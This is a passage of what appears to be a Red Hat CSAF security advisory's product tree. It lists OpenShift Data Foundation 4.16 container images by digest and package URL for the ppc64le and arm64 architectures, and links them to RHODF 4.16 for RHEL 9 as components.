"pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product_id: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product: { name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product_id: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product: { name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product_id: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product: { name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product_id: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product_id: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product: { name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product_id: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121?arch=arm64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product_id: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product_id: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: 